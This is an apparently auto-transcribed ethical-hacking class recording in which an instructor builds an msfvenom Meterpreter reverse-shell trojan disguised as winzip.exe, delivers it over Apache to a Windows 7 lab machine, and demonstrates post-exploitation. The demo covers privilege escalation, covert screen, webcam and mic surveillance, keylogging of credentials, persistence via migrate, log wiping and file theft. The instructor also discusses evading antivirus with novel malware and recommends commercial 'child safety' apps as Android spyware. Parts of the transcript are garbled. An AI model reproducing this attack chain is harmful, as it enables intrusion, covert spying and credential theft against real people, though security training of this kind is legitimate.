The
This
MSF
conference
console.
will now be recorded.
MSF console. Okay. So once the MSF Venom Trojan is sent to the victim, and once it's installed here, that generates a reverse connection back to my attacker machine on MSF console. Okay, so this here is the attacker, and this here is the victim. Okay, so again, as mentioned, these are all the commands available in MSF Venom to create the Trojan clients for different platforms, whether it be Windows or whether it be Android or whether it be Linux as well. Okay, so let's get into the practical part now. Okay, so I have my two machines here. Kali will be the attacker machine, and my Windows 7 here is going to be my victim machine. Okay, so let me quickly restart this as well. Just a second. I just installed Windows 7 today. It's a fresh setup. So I'm going to first install a browser in this so that I can access the internet, and I'm going to create a snapshot as well. Let me quickly complete that first. So first things first, I'll go to my Internet Explorer here. I'll download Firefox or Google Chrome. Anything works, but Firefox is always a bit more lightweight compared to Google Chrome. So I'm just going to click on Firefox download. Click on the first link, I suppose. The second one, yeah. Download Mozilla Firefox for Windows. Might be a bit slow. Let's wait for that. Scroll down. Click on download here. Run. Run again. Okay. Scroll down again. And click on download Firefox ESR 32-bit. This is the one compatible with my Windows 7 here. So this should work. Perfect. Yes. Next. Next. Install. Again, you don't have to do all this if you already have the browser, guys. So since this is a fresh installation and I have to access the browser in this practical, I installed it right now. So click on finish. And now you can create a snapshot as well, just in case if this machine goes corrupt in the future, you have a restore point. Okay. So VM snapshot, click on take snapshot. I've shown you this entire procedure in the Trojans class earlier, if you remember. Okay. So fresh installation, let's say only browser installed. Okay. Now I'll go back to my Kali. I'll log in here with my root credentials. And now in my terminal here, I'm going to run the MSF Venom command. So I'll open up my terminal here. And the command goes as follows. So you type MSF Venom. And just so that I know my attacker's IP, my Kali system's IP, let me split my terminal here and check the IP as well. ifconfig. Yeah. So my Kali system's IP is 192.168.0.9. So I can use that here. So MSF Venom -P for payload. Since we're attacking a Windows system right now, Windows / metapreter / reverse underscore TCP. Okay. -- platform Windows -file type exe, and then lhost attacker's IP, which is 192.168.0.9, the same IP which is mentioned here. L port, you can specify any port of your choice. Let's say 5566. Okay. -O for output file. So let me save it on my desktop itself, and let's call this file, let's say winzip.exe. So this is the name I'm giving to my malware. Okay. So now when I hit enter, this starts generating the malicious Trojan client for me. Might take a minute. Let's wait for that. But once it's done on the desktop, you should now see a file called winzip.exe if you notice here. Okay. So as you can see, it says completed, saved as winzip.exe. And I have the same file here in my Kali system. Okay, if you notice. Okay. So now once that is done, we can now in the other terminal start the Metasploit framework. Service post GRESQL start to start the database, then MSF console to start the Metasploit framework console. And now here we need to use an exploit. So again, whenever you talk about Metasploit framework, it's all about exploitation. We need to use an exploit here. And the common exploit to use for any MSF Venom Trojan or any MSF Venom Trojan client is use exploit multi-handler. So I've mentioned it here in the notepad file as well. Open Metasploit framework and use exploit multi-handler. Okay, so this is the exploit to use to handle multiple reverse connections. Exploit multi-handler. Okay, now we need to set a payload as well. So type set payload, and whatever payload you have mentioned here in the MSF Venom command, copy that same payload, mention it here as well. Okay, so we're just making this open port in my Kali system compatible with the MSF Venom. Okay, so whatever payload you mention here, whatever L host and L port you mention here, all of the same details should be mentioned in the MSF console so that it can capture the reverse connection received on those exact details from those Trojan client. Okay, so now whatever is mentioned here in the payload here, I'm mentioning the same payload here as well. Now if I type show options, there are only two important options, L host and L port. And you know what to enter here. Whatever is mentioned here, L host and L port here in MSF Venom, mention the same details here as well. So set L host 192.168.0.9, set L port 5566. Okay. So once all that is done, if you run the netstat command now, before running the MSF console exploit, so if I run the command netstat hyphen PANT, P for process ID, A for all, N for numbers, and T for TCP connections, there is no such port like 5566 open here right now. But as soon as I run the command exploit here, now the port 5566 starts listening. So if I run the same command again, let's wait for a while. Yeah, it should start listening now. And now you can see this 5566 in a listening state. Okay. Now when this is listening, now I can share this winzip.file to the Windows 7. Now you might have a question, how do we share files from Kali to Windows? We have learned in the earlier classes how to share files from Windows to Windows with a shared folder. But in Kali also, you can create a shared folder. So if you go to your file system here, in your file system, you have to go to var www and html. This is the folder for your web server in Kali. So if you open up your browser in any system, so if I go to my Windows 7 itself, and in my Windows 7, if I open up my browser, or my Windows 11, anything works. And if I give my Kali's IP here, 192.168.0.9, right now nothing is accessible if you notice. It keeps on loading like this. Okay. But if I, oh, sorry, my bad. This should be HTTP actually. Okay, so even if I give HTTP as well, it will not work. Okay, but if I go back to my Kali here, and if I run a simple command, let's say service Apache 2 start. This is the name of the service for the web server in Kali. So when I hit enter, whatever index.html page is available here, now that starts displaying in the browsers. So if I go to my browser now, if I refresh the same page again, now you can see this shows the Apache 2 default login page. Okay, so this is the same page which is mentioned here actually. If I open this up in the browser, you can see it's the same exact page. Okay, so what you can do now is you can remove these pages instead, delete them, and now you can create a new folder called share folder. Okay, And in that folder, you can put this file now. Now what happens is whoever accesses that IP in the browser can actually see the folder now. So if I go back to my terminal and if I run service Apache 2 restart, because we have made some modifications, I've restarted the service. So if I go here now and if I refresh the page, carefully observe what happens. I now can see a shared folder, and in the shared folder I have the winzip.exe again. Okay, so let me open the same thing in my Windows 7 as well. Firefox 192.168.0.9 Kali's IP. I have the shared folder now, and here I have the WinZip file. I'm going to download this, and once it's downloaded, if I go to my computer, downloads, you see there's a WinZip file here. And as soon as I execute this, carefully observe in the Kali terminal. So right now I've not gotten any connection yet. Okay, but as soon as I double click or execute this file, right click and run it as admin or anything. As soon as I do that in my Kali system now, I should get a connection. As you can see, it says Metapreter session 1 has opened up. Okay. Now this is an advanced payload, guys. Metapreter is a much more advanced payload. Just give me 2 minutes, guys. Someone's at the door. Let me quickly get that. I'm so sorry for the interruptions. Hey guys, I'm so sorry about that. Took slightly longer than expected. But again, yeah, coming back to this, as mentioned, when you talk about the MSF Venom payload and the Metapreter session that has opened up here. Now, this is an advanced payload, guys. What I mean by that is this not only gives you shell connections, but again performs a lot more operations as well. For example, if I run the command help here, this shows me all the operations that I can perform. Okay, so again, this is the machine that I have a remote connection to right now, the Windows 7 machine, and on this machine I can perform all these operations. Okay, first command. So if you see, oh, 1 second, just a minute, collapse subterminal, and yeah, first command that I have here is get system. Now this command allows you to elevate your privileges, which means if you're not the admin account holder on the target system, if the connection you have is not of admin access, you can elevate your privileges to the admin access. So if I run the command get system here, now you can see it says I'm the admin on the target device. Okay, and I can perform all sorts of admin operations as well. So if I scroll up much further, there's a command here called screenshot, if you notice. So this allows you to grab a screenshot of the interactive desktop. So if I run the command screenshot here, and if I hit enter, this takes a screenshot of the target system now, and it's saved on my desktop apparently. So if I go to my desktop here, you can see this is the screenshot captured right now, exactly at 8:32 a.m. That's the time right now. Okay. Similarly, if I run the command screen share, so if I scroll up, there's a command called screen share as well. And this allows you to watch the remote user as well in real time. So if I run the command screen share, now this opens up a browser for me. And in the browser, I can remotely watch what the victim is doing as well. So if I go to my Windows 7 system here, if I open up my browser, and in my browser, if I search for, let's say, Facebook, okay, whatever operations I perform here, they are shown to me in the Kali system here. As you can see in the browser, I can remotely watch what the victim is doing as well, and it gets updated in real time. Okay, not just that, again, there's other commands also. If I scroll up, if the system has any microphone or if it has a webcam, you can record data from that webcam or record audio from the microphone as well. But again, since this is a virtual machine, it has neither of them, therefore these won't work right now. But when this is performed on a real-time system, you can perform all these operations as well. Take pictures from the webcam, play a video from the webcam, okay, list out all the webcams on the device, start a video chat, okay, and also record audio from the mic of the system, okay. And again, the user won't even have a clue that all this is happening in the background. Okay. Not just that, there's also a command here called idle time to show you how many seconds has the user been idle. So if he has been away from the system, it tells you how much duration has the, okay, let me control C to stop this. Yeah. And now I can run a command idle time to figure out how long the user has been idle for. So exactly for 1 minute right now, it's been idle on the target device. Okay. Scroll up much further. There's another important command called migrate. So if you scroll up, you can see there's a command here called migrate somewhere. Yeah, here, this one. Quite an important command. What this does is it allows you to migrate your existing Metapreter connection to a system process so that even if the system restarts, you have a persistent connection and you can reconnect automatically back to the device. So if I type PS here, it shows all the processes running on the target system. Okay. And my process is WinZip actually. So if you scroll down, this is my process running with the process ID 3416. Let me expand the screen a bit, much better. So if I type PS again, you can see this is my process here running with 3416 as the process ID. What I can do now is I can run my process as a system process. So I just need to migrate this process to a system process here. Anything will work. So I can go migrate to this one or services.exe or wininit.exe or explorer.exe, any system process which has authority, again, remote admin connection as well, can be migrated. Okay, so I can run the command migrate and I can give the process ID for that process. Let's say if I want to migrate it to my Explorer, okay, so I can give 1696 here, 16 migrate space 1696, and now when I hit enter, my system now migrates to that process. Okay, and if the migration completes successfully, it means you have now a persistent connection. As long as system is running, even if you restart it, you still automatically connect back from that internal system process. Okay. Now, similarly, there are other commands also. So if I type help again, Let me show you some more interesting commands. So there's a command called keyscan here. This is for a keylogger. So if I run keyscan start, it captures all the keystrokes on the target system. So if I run keyscan underscore start, now if I go to the victim system here, and no matter what I type, where I type, every single keystroke will be captured. For example, if I type here Charles123 at the rate gmail.com, and if I run a password here, let's say Ben12345. Okay. Now when I click on login, so whatever I enter here as credentials, those will be captured in the Kali system. So I can go to my Kali here, run a command keyscan dump to dump all the keystrokes. So I can type keyscan underscore dump, and you can see whatever I type there, Charles13 shift at the rate gmail.com, and the password Ben12345. Every single thing is visible here. Okay. Not just that, if I scroll up, I can also have a command here called shell. And with this, I can get a remote shell connection as well. So it also gives me shell access. As you can see, this is the command prompt for the target system. Okay. And I can type dir to list out all the files, cd space dot dot, go one step back, okay, whatnot. I have complete shell connection as well. Okay. Not just that, if I run the help command again, there's also a command called clearf. What this does is it clears all the event logs. So how does a hacker hide his events or hide his activities? So he can delete the log files, and that is done with the clearf command here, CLEARE, and you can see it deletes all the application event logs from the system. Okay, so that is how you can delete logs as well from the target system. Not just that, if you scroll up even further, you also have a command here to download content from the remote system. So there's a command called download. For example, there's a file here. Let me generate a new file. Let's call this shoaib or something, a random file. Okay, let's write some data. Hello, this is shoaib. We are working on the Metaprinter connection. Blah blah blah. Okay, some random file over here. Let's say if I had to download this file now. Okay, so now I can type pwd to figure out where I am. I can go to cd space dot dot cd space dot dot, and if I type ls, I can see all the files in C drive. I can go to users. I can go to the root user, and there's a user called, there's a folder called desktop there, and in my desktop I have this file shoaib.txt. Okay, and if I have to download this file now, all I have to do is give the entire path for the file. So download space, give the path. It's better to give it in double quotes just so that if there's any spaces they get omitted. Copy the entire path from here. C users root desktop, and give the file name as well. On desktop there's a file called shoaib.txt. So in Windows you always give backward slashes, and if you want to download it to Linux you give forward slashes, /root /desktop. Okay, and now carefully observe as I run this command, when I hit enter, that file gets downloaded on my desktop here, and then that file, I have the same data again, as you can notice. One second, let me increase the font. Yeah, much better. As you can see, same exact file. Okay, hello, this is Shoaib. We're working on the Metaprinter connection. Blah blah blah. Okay, so this is how you can remotely download files. You can remotely capture screenshots. You can remotely run keyloggers. You can remotely delete logs. Do all sorts of things with this Metaprinter connection. In the earlier classes, we have only learned how to perform or get shell connections. But if Metaprinter is available through a Trojan connection, you can perform all sorts of operations as such. Okay, so this is all about Metaprinter. Can work for all sorts of operating systems, Windows, Linux, or Android. But one issue with Android for this is it does not work on the latest version, on Android 14. Okay, I've tried this out multiple times. Works only up to Android 13. So for Android hacking, there are much better alternative tools, but they are paid tools. Okay. Benji, encrypted files too. Yeah, it can download encrypted files as well, Benji. But the point is, if you want to decrypt that file, you need the key for it. So if there's no key, you cannot decrypt it. So it's useless downloading encrypted files. You definitely can download them, but without the key, there's no again benefit out of it. Okay. Now moving back, as mentioned, for Android hacking, you would have some other tools again, but they're paid applications. And the funny thing about them is they're being sold online
I
as
have a
child
question, please.
applications. Oh yeah, Charles, go
Yeah,
ahead.
so let's say you are performing this task on the Windows, like let's say you are attacking the Windows system, and then in most cases, like you said, the firewall should be off, like the defender should be off, right? Before
Not
you can
necessarily.
attack.
These are Trojan connections. For Trojan, you're performing a reverse connection here. So there's no harm with the firewall being on. But yeah, Defender, if this is the latest Defender, this will definitely detect this Trojan attack. So again, you would have to again encrypt this Trojan in a certain way that they are not detected. Okay. But again,
Okay.
as mentioned, so again, that's the main purpose of a hacker. He should not see to it that his application doesn't get detected. But with the latest defenders and all, unless and until a completely new application written from the source code from scratch, it's pretty
Yeah,
tough to not get detected. Okay.
yeah. That is why I
So
was saying that. That is the question I wanted to ask because I know that the new Windows defenders they are a bit tough. That is why I wanted to know because it's not
right,
easy to bypass them like that. But all the same
exactly.
things.
So if you remember in the malwares class, we wrote our own Trojan, right? So I wrote the command go to command one, then I opened up a notepad file. So if you're writing the Trojan that way, if you're developing it yourself and it's completely new code, it has never been used online. In such a scenario, those applications can easily bypass the defender as well. Okay. But if you're using some third-party application already existing malware builders like Metasploit or Metapredator or so, they have the signatures for this already. So it's pretty easy to detect them. Okay. So when hackers try to perform malware attacks, they might write their own malwares. So it's completely new piece of code, and no one has any signature of it till date. Okay, but once it's used and once it is detected, second day if he uses it, it'll be blocked. Okay, so again, that's the issue with malwares. You have to create a new one until it gets discovered. Okay, is that clear, Charles?
Yes, very clear. Thank you.
Right, moving on to the next part, as mentioned, when you talk about mobile hacking, guys, these are not paid, I mean, so not free applications, though. For mobile hacking, you have to go for paid applications itself. And as mentioned, the interesting thing about it is they're being sold online as child safety apps. Okay. But basically, again, there's this application called Cerberus, as you can see, anti-theft or persona or kid safety app. But basically, this is a remote Android Trojan. It is capable of having your camera access, your location access, your data access, okay, your alarm or your clock access, every single thing. Okay. And again, it's not free. You can see there's a pricing over here. It's being sold for €5 a year or something. Pretty cheap still, I would say. Okay, but only for one device. Okay. So for 1 year access for that remote phone, you have to install this. When you click on download, it'll download an APK file. You have to share that to the victim. And once it's installed on their system, you can log in here and get remote connection of that phone. Okay, so this is one of the applications available. There's others as well. There's something called Spy Human. Again, this is also being sold online as child safety or family safety app, etc. If you notice. But again, this is basically an Android Trojan. It can perform all sorts of operations. Get your call logs, get your text messages, get your location, get your contacts access, get your social media access, okay, web monitoring, microphone access, file explorer, every single thing. Okay. So, but again, as mentioned, not for free. They are at a certain price. Okay, so $9 per month or so. Okay, so these are the applications available online for remote Android hacking as well. But with Metapredator in the earlier days, for up to Android 13, it was again, as mentioned, working properly. So you could perform the same exact procedure for Android as well. Okay, but from Android 14, they've added the signatures for this, and they have again removed the again this as a and discarded it as a malware. When you try to install it as well, it throws an error saying a malware detected. Okay, so that's an issue with Metapredator for Android. So therefore, for Android, the only alternative is going with these paid applications. Okay. So yeah, that concludes the method three of pen testing as well, guys. So we have learned method one with the necessary report, method two without the necessary report, and method three with Trojan attacks. What if the system doesn't contain any vulnerability? In such scenario, hackers use malwares instead. Okay, that's method three. So this concludes the entire network pen testing module. In the next session, we're going to go with the web pen testing module. That is one of the last topics left out for our entire course. Okay. So that's that, nothing further. We can exit the session here and connect back tomorrow at the same time. Okay. Bye-bye. Any questions before we exit? Ben, Wahab, Charles? Okay. Bye, guys.